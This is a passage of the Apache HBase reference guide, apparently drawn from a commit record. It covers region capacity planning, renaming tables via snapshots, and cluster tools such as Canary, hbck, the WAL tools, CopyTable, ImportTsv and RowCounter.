memstores (see <<hbase.regionserver.global.memstore.size,hbase.regionserver.global.memstore.size>>). If this memory is exceeded (too much memstore usage), it can cause undesirable consequences such as unresponsive server or compaction storms.\nA good starting point for the number of regions per RS (assuming one table) is:\n\n[source]\n----\n((RS memory) * (total memstore fraction)) \/ ((memstore size)*(# column families))\n----\n\nThis formula is pseudo-code.\nHere are two formulas using the actual tunable parameters, first for HBase 0.98+ and second for HBase 0.94.x.\n\nHBase 0.98.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.size) \/ (hbase.hregion.memstore.flush.size * (# column families))\n----\nHBase 0.94.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.upperLimit) \/ (hbase.hregion.memstore.flush.size * (# column families))+\n----\n\nIf a given RegionServer has 16 GB of RAM, with default settings, the formula works out to 16384*0.4\/128 ~ 51 regions per RS is a starting point.\nThe formula can be extended to multiple tables; if they all have the same configuration, just use the total number of families.\n\nThis number can be adjusted; the formula above assumes all your regions are filled at approximately the same rate.\nIf only a fraction of your regions are going to be actively written to, you can divide the result by that fraction to get a larger region count.\nThen, even if all regions are written to, all region memstores are not filled evenly, and eventually jitter appears even if they are (due to limited number of concurrent flushes). Thus, one can have as many as 2-3 times more regions than the starting point; however, increased numbers carry increased risk.\n\nFor write-heavy workload, memstore fraction can be increased in configuration at the expense of block cache; this will also allow one to have more regions.\n\n[[ops.capacity.regions.mincount]]\n==== Number of regions per RS - lower bound\n\nHBase scales by having regions across many servers.\nThus if you have 2 regions for 16GB data, on a 20 node machine your data will be concentrated on just a few machines - nearly the entire cluster will be idle.\nThis really can't be stressed enough, since a common problem is loading 200MB data into HBase and then wondering why your awesome 10 node cluster isn't doing anything.\n\nOn the other hand, if you have a very large amount of data, you may also want to go for a larger number of regions to avoid having regions that are too large.\n\n[[ops.capacity.regions.size]]\n==== Maximum region size\n\nFor large tables in production scenarios, maximum region size is mostly limited by compactions - very large compactions, esp.\nmajor, can degrade cluster performance.\nCurrently, the recommended maximum region size is 10-20Gb, and 5-10Gb is optimal.\nFor older 0.90.x codebase, the upper-bound of regionsize is about 4Gb, with a default of 256Mb.\n\nThe size at which the region is split into two is generally configured via <<hbase.hregion.max.filesize,hbase.hregion.max.filesize>>; for details, see <<arch.region.splits,arch.region.splits>>.\n\nIf you cannot estimate the size of your tables well, when starting off, it's probably best to stick to the default region size, perhaps going smaller for hot tables (or manually split hot regions to spread the load over the cluster), or go with larger region sizes if your cell sizes tend to be largish (100k and up).\n\nIn HBase 0.98, experimental stripe compactions feature was added that would allow for larger regions, especially for log data.\nSee <<ops.stripe,ops.stripe>>.\n\n[[ops.capacity.regions.total]]\n==== Total data size per region server\n\nAccording to above numbers for region size and number of regions per region server, in an optimistic estimate 10 GB x 100 regions per RS will give up to 1TB served per region server, which is in line with some of the reported multi-PB use cases.\nHowever, it is important to think about the data vs cache size ratio at the RS level.\nWith 1TB of data per server and 10 GB block cache, only 1% of the data will be cached, which may barely cover all block indices.\n\n[[ops.capacity.config]]\n=== Initial configuration and tuning\n\nFirst, see <<important_configurations,important configurations>>.\nNote that some configurations, more than others, depend on specific scenarios.\nPay special attention to:\n\n* <<hbase.regionserver.handler.count,hbase.regionserver.handler.count>> - request handler thread count, vital for high-throughput workloads.\n* <<config.wals,config.wals>> - the blocking number of WAL files depends on your memstore configuration and should be set accordingly to prevent potential blocking when doing high volume of writes.\n\nThen, there are some considerations when setting up your cluster and tables.\n\n[[ops.capacity.config.compactions]]\n==== Compactions\n\nDepending on read\/write volume and latency requirements, optimal compaction settings may be different.\nSee <<compaction,compaction>> for some details.\n\nWhen provisioning for large data sizes, however, it's good to keep in mind that compactions can affect write throughput.\nThus, for write-intensive workloads, you may opt for less frequent compactions and more store files per regions.\nMinimum number of files for compactions (`hbase.hstore.compaction.min`) can be set to higher value; <<hbase.hstore.blockingStoreFiles,hbase.hstore.blockingStoreFiles>> should also be increased, as more files might accumulate in such case.\nYou may also consider manually managing compactions: <<managed.compactions,managed.compactions>>\n\n[[ops.capacity.config.presplit]]\n==== Pre-splitting the table\n\nBased on the target number of the regions per RS (see <<ops.capacity.regions.count,ops.capacity.regions.count>>) and number of RSes, one can pre-split the table at creation time.\nThis would both avoid some costly splitting as the table starts to fill up, and ensure that the table starts out already distributed across many servers.\n\nIf the table is expected to grow large enough to justify that, at least one region per RS should be created.\nIt is not recommended to split immediately into the full target number of regions (e.g.\n50 * number of RSes), but a low intermediate value can be chosen.\nFor multiple tables, it is recommended to be conservative with presplitting (e.g.\npre-split 1 region per RS at most), especially if you don't know how much each table will grow.\nIf you split too much, you may end up with too many regions, with some tables having too many small regions.\n\nFor pre-splitting howto, see <<manual_region_splitting_decisions,manual region splitting decisions>> and <<precreate.regions,precreate.regions>>.\n\n[[table.rename]]\n== Table Rename\n\nIn versions 0.90.x of hbase and earlier, we had a simple script that would rename the hdfs table directory and then do an edit of the hbase:meta table replacing all mentions of the old table name with the new.\nThe script was called `.\/bin\/rename_table.rb`.\nThe script was deprecated and removed mostly because it was unmaintained and the operation performed by the script was brutal.\n\nAs of hbase 0.94.x, you can use the snapshot facility renaming a table.\nHere is how you would do it using the hbase shell:\n\n----\nhbase shell> disable 'tableName'\nhbase shell> snapshot 'tableName', 'tableSnapshot'\nhbase shell> clone_snapshot 'tableSnapshot', 'newTableName'\nhbase shell> delete_snapshot 'tableSnapshot'\nhbase shell> drop 'tableName'\n----\n\nor in code it would be as follows:\n\n[source,java]\n----\nvoid rename(Admin admin, String oldTableName, TableName newTableName) {\n String snapshotName = randomName();\n admin.disableTable(oldTableName);\n admin.snapshot(snapshotName, oldTableName);\n admin.cloneSnapshot(snapshotName, newTableName);\n admin.deleteSnapshot(snapshotName);\n admin.deleteTable(oldTableName);\n}\n----\n","old_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[ops_mgt]]\n= Apache HBase Operational Management\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nThis chapter will cover operational tools and practices required of a running Apache HBase cluster.\nThe subject of operations is related to the topics of <<trouble>>, <<performance>>, and <<configuration>> but is a distinct topic in itself.\n\n[[tools]]\n== HBase Tools and Utilities\n\nHBase provides several tools for administration, analysis, and debugging of your cluster.\nThe entry-point to most of these tools is the _bin\/hbase_ command, though some tools are available in the _dev-support\/_ directory.\n\nTo see usage instructions for _bin\/hbase_ command, run it with no arguments, or with the `-h` argument.\nThese are the usage instructions for HBase 0.98.x.\nSome commands, such as `version`, `pe`, `ltt`, `clean`, are not available in previous versions.\n\n----\n$ bin\/hbase\nUsage: hbase [<options>] <command> [<args>]\nOptions:\n --config DIR Configuration direction to use. Default: .\/conf\n --hosts HOSTS Override the list in 'regionservers' file\n\nCommands:\nSome commands take arguments. Pass no args or -h for usage.\n shell Run the HBase shell\n hbck Run the hbase 'fsck' tool\n wal Write-ahead-log analyzer\n hfile Store file analyzer\n zkcli Run the ZooKeeper shell\n upgrade Upgrade hbase\n master Run an HBase HMaster node\n regionserver Run an HBase HRegionServer node\n zookeeper Run a ZooKeeper server\n rest Run an HBase REST server\n thrift Run the HBase Thrift server\n thrift2 Run the HBase Thrift2 server\n clean Run the HBase clean up script\n classpath Dump hbase CLASSPATH\n mapredcp Dump CLASSPATH entries required by mapreduce\n pe Run PerformanceEvaluation\n ltt Run LoadTestTool\n version Print the version\n CLASSNAME Run the class named CLASSNAME\n----\n\nSome of the tools and utilities below are Java classes which are passed directly to the _bin\/hbase_ command, as referred to in the last line of the usage instructions.\nOthers, such as `hbase shell` (<<shell>>), `hbase upgrade` (<<upgrading>>), and `hbase thrift` (<<thrift>>), are documented elsewhere in this guide.\n\n=== Canary\n\nThere is a Canary class can help users to canary-test the HBase cluster status, with every column-family for every regions or RegionServer's granularity.\nTo see the usage, use the `--help` parameter.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -help\n\nUsage: bin\/hbase org.apache.hadoop.hbase.tool.Canary [opts] [table1 [table2]...] | [regionserver1 [regionserver2]..]\n where [opts] are:\n -help Show this help and exit.\n -regionserver replace the table argument to regionserver,\n which means to enable regionserver mode\n -daemon Continuous check at defined intervals.\n -interval <N> Interval between checks (sec)\n -e Use region\/regionserver as regular expression\n which means the region\/regionserver is regular expression pattern\n -f <B> stop whole program if first error occurs, default is true\n -t <N> timeout for a check, default is 600000 (milliseconds)\n -writeSniffing enable the write sniffing in canary\n -treatFailureAsError treats read \/ write failure as error\n -writeTable The table used for write sniffing. Default is hbase:canary\n -D<configProperty>=<value> assigning or override the configuration params\n----\n\nThis tool will return non zero error codes to user for collaborating with other monitoring tools, such as Nagios.\nThe error code definitions are:\n\n[source,java]\n----\nprivate static final int USAGE_EXIT_CODE = 1;\nprivate static final int INIT_ERROR_EXIT_CODE = 2;\nprivate static final int TIMEOUT_ERROR_EXIT_CODE = 3;\nprivate static final int ERROR_EXIT_CODE = 4;\n----\n\nHere are some examples based on the following given case.\nThere are two Table objects called test-01 and test-02, they have two column family cf1 and cf2 respectively, and deployed on the 3 RegionServers.\nsee following table.\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| RegionServer\n| test-01\n| test-02\n| rs1 | r1 | r2\n| rs2 | r2 |\n| rs3 | r2 | r1\n|===\n\nFollowing are some examples based on the previous given case.\n\n==== Canary test for every column family (store) of every region of every table\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary\n\n3\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf1 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf2 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf1 in 4ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf2 in 1ms\n...\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf1 in 5ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf2 in 3ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf1 in 31ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf2 in 8ms\n----\n\nSo you can see, table test-01 has two regions and two column families, so the Canary tool will pick 4 small piece of data from 4 (2 region * 2 store) different stores.\nThis is a default behavior of the this tool does.\n\n==== Canary test for every column family (store) of every region of specific table(s)\n\nYou can also test one or more specific tables.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary test-01 test-02\n----\n\n==== Canary test with RegionServer granularity\n\nThis will pick one small piece of data from each RegionServer, and can also put your RegionServer name as input options for canary-test specific RegionServer.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -regionserver\n\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs2 in 72ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-02 on region server:rs3 in 34ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs1 in 56ms\n----\n\n==== Canary test with regular expression pattern\n\nThis will test both table test-01 and test-02.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -e test-0[1-2]\n----\n\n==== Run canary test as daemon mode\n\nRun repeatedly with interval defined in option `-interval` whose default value is 6 seconds.\nThis daemon will stop itself and return non-zero error code if any error occurs, due to the default value of option -f is true.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon\n----\n\nRun repeatedly with internal 5 seconds and will not stop itself even if errors occur in the test.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon -interval 50000 -f false\n----\n\n==== Force timeout if canary test stuck\n\nIn some cases the request is stuck and no response is sent back to the client. This can happen with dead RegionServers which the master has not yet noticed.\nBecause of this we provide a timeout option to kill the canary test and return a non-zero error code.\nThis run sets the timeout value to 60 seconds, the default value is 600 seconds.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -t 600000\n----\n\n==== Enable write sniffing in canary\n\nBy default, the canary tool only check the read operations, it's hard to find the problem in the\nwrite path. To enable the write sniffing, you can run canary with the `-writeSniffing` option.\nWhen the write sniffing is enabled, the canary tool will create an hbase table and make sure the\nregions of the table distributed on all region servers. In each sniffing period, the canary will\ntry to put data to these regions to check the write availability of each region server.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing\n----\n\nThe default write table is `hbase:canary` and can be specified by the option `-writeTable`.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing -writeTable ns:canary\n----\n\nThe default value size of each put is 10 bytes and you can set it by the config key:\n`hbase.canary.write.value.size`.\n\n==== Treat read \/ write failure as error\n\nBy default, the canary tool only logs read failure, due to e.g. RetriesExhaustedException,\nwhile returning normal exit code. To treat read \/ write failure as error, you can run canary\nwith the `-treatFailureAsError` option. When enabled, read \/ write failure would result in error\nexit code.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary --treatFailureAsError\n----\n\n==== Running Canary in a Kerberos-enabled Cluster\n\nTo run Canary in a Kerberos-enabled cluster, configure the following two properties in _hbase-site.xml_:\n\n* `hbase.client.keytab.file`\n* `hbase.client.kerberos.principal`\n\nKerberos credentials are refreshed every 30 seconds when Canary runs in daemon mode.\n\nTo configure the DNS interface for the client, configure the following optional properties in _hbase-site.xml_.\n\n* `hbase.client.dns.interface`\n* `hbase.client.dns.nameserver`\n\n.Canary in a Kerberos-Enabled Cluster\n====\nThis example shows each of the properties with valid values.\n\n[source,xml]\n----\n<property>\n <name>hbase.client.kerberos.principal<\/name>\n <value>hbase\/_HOST@YOUR-REALM.COM<\/value>\n<\/property>\n<property>\n <name>hbase.client.keytab.file<\/name>\n <value>\/etc\/hbase\/conf\/keytab.krb5<\/value>\n<\/property>\n<!-- optional params -->\nproperty>\n <name>hbase.client.dns.interface<\/name>\n <value>default<\/value>\n<\/property>\n<property>\n <name>hbase.client.dns.nameserver<\/name>\n <value>default<\/value>\n<\/property>\n----\n====\n\n[[health.check]]\n=== Health Checker\n\nYou can configure HBase to run a script periodically and if it fails N times (configurable), have the server exit.\nSee _HBASE-7351 Periodic health check script_ for configurations and detail.\n\n=== Driver\n\nSeveral frequently-accessed utilities are provided as `Driver` classes, and executed by the _bin\/hbase_ command.\nThese utilities represent MapReduce jobs which run on your cluster.\nThey are run in the following way, replacing _UtilityName_ with the utility you want to run.\nThis command assumes you have set the environment variable `HBASE_HOME` to the directory where HBase is unpacked on your server.\n\n----\n\n${HBASE_HOME}\/bin\/hbase org.apache.hadoop.hbase.mapreduce.UtilityName\n----\n\nThe following utilities are available:\n\n`LoadIncrementalHFiles`::\n Complete a bulk data load.\n\n`CopyTable`::\n Export a table from the local cluster to a peer cluster.\n\n`Export`::\n Write table data to HDFS.\n\n`Import`::\n Import data written by a previous `Export` operation.\n\n`ImportTsv`::\n Import data in TSV format.\n\n`RowCounter`::\n Count rows in an HBase table.\n\n`CellCounter`::\n Count cells in an HBase table.\n\n`replication.VerifyReplication`::\n Compare the data from tables in two different clusters.\n WARNING: It doesn't work for incrementColumnValues'd cells since the timestamp is changed.\n Note that this command is in a different package than the others.\n\nEach command except `RowCounter` and `CellCounter` accept a single `--help` argument to print usage instructions.\n\n[[hbck]]\n=== HBase `hbck`\n\nTo run `hbck` against your HBase cluster run `$.\/bin\/hbase hbck`. At the end of the command's output it prints `OK` or `INCONSISTENCY`.\nIf your cluster reports inconsistencies, pass `-details` to see more detail emitted.\nIf inconsistencies, run `hbck` a few times because the inconsistency may be transient (e.g. cluster is starting up or a region is splitting).\n Passing `-fix` may correct the inconsistency (This is an experimental feature).\n\nFor more information, see <<hbck.in.depth>>.\n\n[[hfile_tool2]]\n=== HFile Tool\n\nSee <<hfile_tool>>.\n\n=== WAL Tools\n\n[[hlog_tool]]\n==== `FSHLog` tool\n\nThe main method on `FSHLog` offers manual split and dump facilities.\nPass it WALs or the product of a split, the content of the _recovered.edits_.\ndirectory.\n\nYou can get a textual dump of a WAL file content by doing the following:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --dump hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\nThe return code will be non-zero if there are any issues with the file so you can test wholesomeness of file by redirecting `STDOUT` to `\/dev\/null` and testing the program return.\n\nSimilarly you can force a split of a log file directory by doing:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --split hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/\n----\n\n[[hlog_tool.prettyprint]]\n===== WAL Pretty Printer\n\nThe WAL Pretty Printer is a tool with configurable options to print the contents of a WAL.\nYou can invoke it via the HBase cli with the 'wal' command.\n\n----\n $ .\/bin\/hbase wal hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\n.WAL Printing in older versions of HBase\n[NOTE]\n====\nPrior to version 2.0, the WAL Pretty Printer was called the `HLogPrettyPrinter`, after an internal name for HBase's write ahead log.\nIn those versions, you can print the contents of a WAL using the same configuration as above, but with the 'hlog' command.\n\n----\n $ .\/bin\/hbase hlog hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n====\n\n[[compression.tool]]\n=== Compression Tool\n\nSee <<compression.test,compression.test>>.\n\n[[copy.table]]\n=== CopyTable\n\nCopyTable is a utility that can copy part or of all of a table, either to the same cluster or another cluster.\nThe target table must first exist.\nThe usage is as follows:\n\n----\n\n$ .\/bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --help\n\/bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --help\nUsage: CopyTable [general options] [--starttime=X] [--endtime=Y] [--new.name=NEW] [--peer.adr=ADR] <tablename>\n\nOptions:\n rs.class hbase.regionserver.class of the peer cluster,\n specify if different from current cluster\n rs.impl hbase.regionserver.impl of the peer cluster,\n startrow the start row\n stoprow the stop row\n starttime beginning of the time range (unixtime in millis)\n without endtime means from starttime to forever\n endtime end of the time range. Ignored if no starttime specified.\n versions number of cell versions to copy\n new.name new table's name\n peer.adr Address of the peer cluster given in the format\n hbase.zookeeer.quorum:hbase.zookeeper.client.port:zookeeper.znode.parent\n families comma-separated list of families to copy\n To copy from cf1 to cf2, give sourceCfName:destCfName.\n To keep the same name, just give \"cfName\"\n all.cells also copy delete markers and deleted cells\n\nArgs:\n tablename Name of the table to copy\n\nExamples:\n To copy 'TestTable' to a cluster that uses replication for a 1 hour window:\n $ bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --starttime=1265875194289 --endtime=1265878794289 --peer.adr=server1,server2,server3:2181:\/hbase --families=myOldCf:myNewCf,cf2,cf3 TestTable\n\nFor performance consider the following general options:\n It is recommended that you set the following to >=100. A higher value uses more memory but\n decreases the round trip time to the server and may increase performance.\n -Dhbase.client.scanner.caching=100\n The following should always be set to false, to prevent writing data twice, which may produce\n inaccurate results.\n -Dmapred.map.tasks.speculative.execution=false\n----\n\n.Scanner Caching\n[NOTE]\n====\nCaching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n====\n\n.Versions\n[NOTE]\n====\nBy default, CopyTable utility only copies the latest version of row cells unless `--versions=n` is explicitly specified in the command.\n====\n\nSee Jonathan Hsieh's link:http:\/\/www.cloudera.com\/blog\/2012\/06\/online-hbase-backups-with-copytable-2\/[Online\n HBase Backups with CopyTable] blog post for more on `CopyTable`.\n\n[[export]]\n=== Export\n\nExport is a utility that will dump the contents of table to HDFS in a sequence file.\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Export <tablename> <outputdir> [<versions> [<starttime> [<endtime>]]]\n----\n\nNOTE: To see usage instructions, run the command with no options. Available options include\nspecifying column families and applying filters during the export.\n\nBy default, the `Export` tool only exports the newest version of a given cell, regardless of the number of versions stored. To export more than one version, replace *_<versions>_* with the desired number of versions.\n\nNote: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\n[[import]]\n=== Import\n\nImport is a utility that will load data that has been exported back into HBase.\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\nNOTE: To see usage instructions, run the command with no options.\n\nTo import 0.94 exported files in a 0.96 cluster or onwards, you need to set system property \"hbase.import.version\" when running the import command as below:\n\n----\n$ bin\/hbase -Dhbase.import.version=0.94 org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\n[[importtsv]]\n=== ImportTsv\n\nImportTsv is a utility that will load data in TSV format into HBase.\nIt has two distinct usages: loading data from TSV format in HDFS into HBase via Puts, and preparing StoreFiles to be loaded via the `completebulkload`.\n\nTo load data via Puts (i.e., non-bulk loading):\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c <tablename> <hdfs-inputdir>\n----\n\nTo generate StoreFiles for bulk-loading:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c -Dimporttsv.bulk.output=hdfs:\/\/storefile-outputdir <tablename> <hdfs-data-inputdir>\n----\n\nThese generated StoreFiles can be loaded into HBase via <<completebulkload,completebulkload>>.\n\n[[importtsv.options]]\n==== ImportTsv Options\n\nRunning `ImportTsv` with no arguments prints brief usage information:\n\n----\n\nUsage: importtsv -Dimporttsv.columns=a,b,c <tablename> <inputdir>\n\nImports the given input directory of TSV data into the specified table.\n\nThe column names of the TSV data must be specified using the -Dimporttsv.columns\noption. This option takes the form of comma-separated column names, where each\ncolumn name is either a simple column family, or a columnfamily:qualifier. The special\ncolumn name HBASE_ROW_KEY is used to designate that this column should be used\nas the row key for each imported record. You must specify exactly one column\nto be the row key, and you must specify a column name for every column that exists in the\ninput data.\n\nBy default importtsv will load data directly into HBase. To instead generate\nHFiles of data to prepare for a bulk data load, pass the option:\n -Dimporttsv.bulk.output=\/path\/for\/output\n Note: the target table will be created with default column family descriptors if it does not already exist.\n\nOther options that may be specified with -D include:\n -Dimporttsv.skip.bad.lines=false - fail if encountering an invalid line\n '-Dimporttsv.separator=|' - eg separate on pipes instead of tabs\n -Dimporttsv.timestamp=currentTimeAsLong - use the specified timestamp for the import\n -Dimporttsv.mapper.class=my.Mapper - A user-defined Mapper to use instead of org.apache.hadoop.hbase.mapreduce.TsvImporterMapper\n----\n\n[[importtsv.example]]\n==== ImportTsv Example\n\nFor example, assume that we are loading data into a table called 'datatsv' with a ColumnFamily called 'd' with two columns \"c1\" and \"c2\".\n\nAssume that an input file exists as follows:\n----\n\nrow1\tc1\tc2\nrow2\tc1\tc2\nrow3\tc1\tc2\nrow4\tc1\tc2\nrow5\tc1\tc2\nrow6\tc1\tc2\nrow7\tc1\tc2\nrow8\tc1\tc2\nrow9\tc1\tc2\nrow10\tc1\tc2\n----\n\nFor ImportTsv to use this input file, the command line needs to look like this:\n\n----\n\n HADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar importtsv -Dimporttsv.columns=HBASE_ROW_KEY,d:c1,d:c2 -Dimporttsv.bulk.output=hdfs:\/\/storefileoutput datatsv hdfs:\/\/inputfile\n----\n\n\\... and in this example the first column is the rowkey, which is why the HBASE_ROW_KEY is used.\nThe second and third columns in the file will be imported as \"d:c1\" and \"d:c2\", respectively.\n\n[[importtsv.warning]]\n==== ImportTsv Warning\n\nIf you have preparing a lot of data for bulk loading, make sure the target HBase table is pre-split appropriately.\n\n[[importtsv.also]]\n==== See Also\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>\n\n[[completebulkload]]\n=== CompleteBulkLoad\n\nThe `completebulkload` utility will move generated StoreFiles into an HBase table.\nThis utility is often used in conjunction with output from <<importtsv,importtsv>>.\n\nThere are two ways to invoke this utility, with explicit classname and via the driver:\n\n.Explicit Classname\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.LoadIncrementalHFiles <hdfs:\/\/storefileoutput> <tablename>\n----\n\n.Driver\n----\nHADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar completebulkload <hdfs:\/\/storefileoutput> <tablename>\n----\n\n[[completebulkload.warning]]\n==== CompleteBulkLoad Warning\n\nData generated via MapReduce is often created with file permissions that are not compatible with the running HBase process.\nAssuming you're running HDFS with permissions enabled, those permissions will need to be updated before you run CompleteBulkLoad.\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>.\n\n=== WALPlayer\n\nWALPlayer is a utility to replay WAL files into HBase.\n\nThe WAL can be replayed for a set of tables or all tables, and a timerange can be provided (in milliseconds). The WAL is filtered to this set of tables.\nThe output can optionally be mapped to another set of tables.\n\nWALPlayer can also generate HFiles for later bulk importing, in that case only a single table and no mapping can be specified.\n\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer [options] <wal inputdir> <tables> [<tableMappings>]>\n----\n\nFor example:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer \/backuplogdir oldTable1,oldTable2 newTable1,newTable2\n----\n\nWALPlayer, by default, runs as a mapreduce job.\nTo NOT run WALPlayer as a mapreduce job on your cluster, force it to run all in the local process by adding the flags `-Dmapreduce.jobtracker.address=local` on the command line.\n\n[[rowcounter]]\n=== RowCounter and CellCounter\n\nlink:http:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/mapreduce\/RowCounter.html[RowCounter] is a mapreduce job to count all the rows of a table.\nThis is a good utility to use as a sanity check to ensure that HBase can read all the blocks of a table if there are any concerns of metadata inconsistency.\nIt will run the mapreduce all in a single process but it will run faster if you have a MapReduce cluster in place for it to exploit. It is also possible to limit\nthe time range of data to be scanned by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.RowCounter <tablename> [<column1> <column2>...]\n----\n\nRowCounter only counts one version per cell.\n\nNote: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\nHBase ships another diagnostic mapreduce job called link:http:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/mapreduce\/CellCounter.html[CellCounter].\nLike RowCounter, it gathers more fine-grained statistics about your table.\nThe statistics gathered by RowCounter are more fine-grained and include:\n\n* Total number of rows in the table.\n* Total number of CFs across all rows.\n* Total qualifiers across all rows.\n* Total occurrence of each CF.\n* Total occurrence of each qualifier.\n* Total number of versions of each qualifier.\n\nThe program allows you to limit the scope of the run.\nProvide a row regex or prefix to limit the rows to analyze.\nSpecify a time range to scan the table by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.\n\nUse `hbase.mapreduce.scan.column.family` to specify scanning a single column family.\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.CellCounter <tablename> <outputDir> [regex or prefix]\n----\n\nNote: just like RowCounter, caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\n=== mlockall\n\nIt is possible to optionally pin your servers in physical memory making them less likely to be swapped out in oversubscribed environments by having the servers call link:http:\/\/linux.die.net\/man\/2\/mlockall[mlockall] on startup.\nSee link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4391[HBASE-4391 Add ability to\n start RS as root and call mlockall] for how to build the optional library and have it run on startup.\n\n[[compaction.tool]]\n=== Offline Compaction Tool\n\nSee the usage for the\nlink:http:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/regionserver\/CompactionTool.html[CompactionTool].\nRun it like:\n\n[source, bash]\n----\n$ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.CompactionTool\n----\n\n=== `hbase clean`\n\nThe `hbase clean` command cleans HBase data from ZooKeeper, HDFS, or both.\nIt is appropriate to use for testing.\nRun it with no options for usage instructions.\nThe `hbase clean` command was introduced in HBase 0.98.\n\n----\n\n$ bin\/hbase clean\nUsage: hbase clean (--cleanZk|--cleanHdfs|--cleanAll)\nOptions:\n --cleanZk cleans hbase related data from zookeeper.\n --cleanHdfs cleans hbase related data from hdfs.\n --cleanAll cleans hbase related data from both zookeeper and hdfs.\n----\n\n=== `hbase pe`\n\nThe `hbase pe` command is a shortcut provided to run the `org.apache.hadoop.hbase.PerformanceEvaluation` tool, which is used for testing.\nThe `hbase pe` command was introduced in HBase 0.98.4.\n\nThe PerformanceEvaluation tool accepts many different options and commands.\nFor usage instructions, run the command with no options.\n\nTo run PerformanceEvaluation prior to HBase 0.98.4, 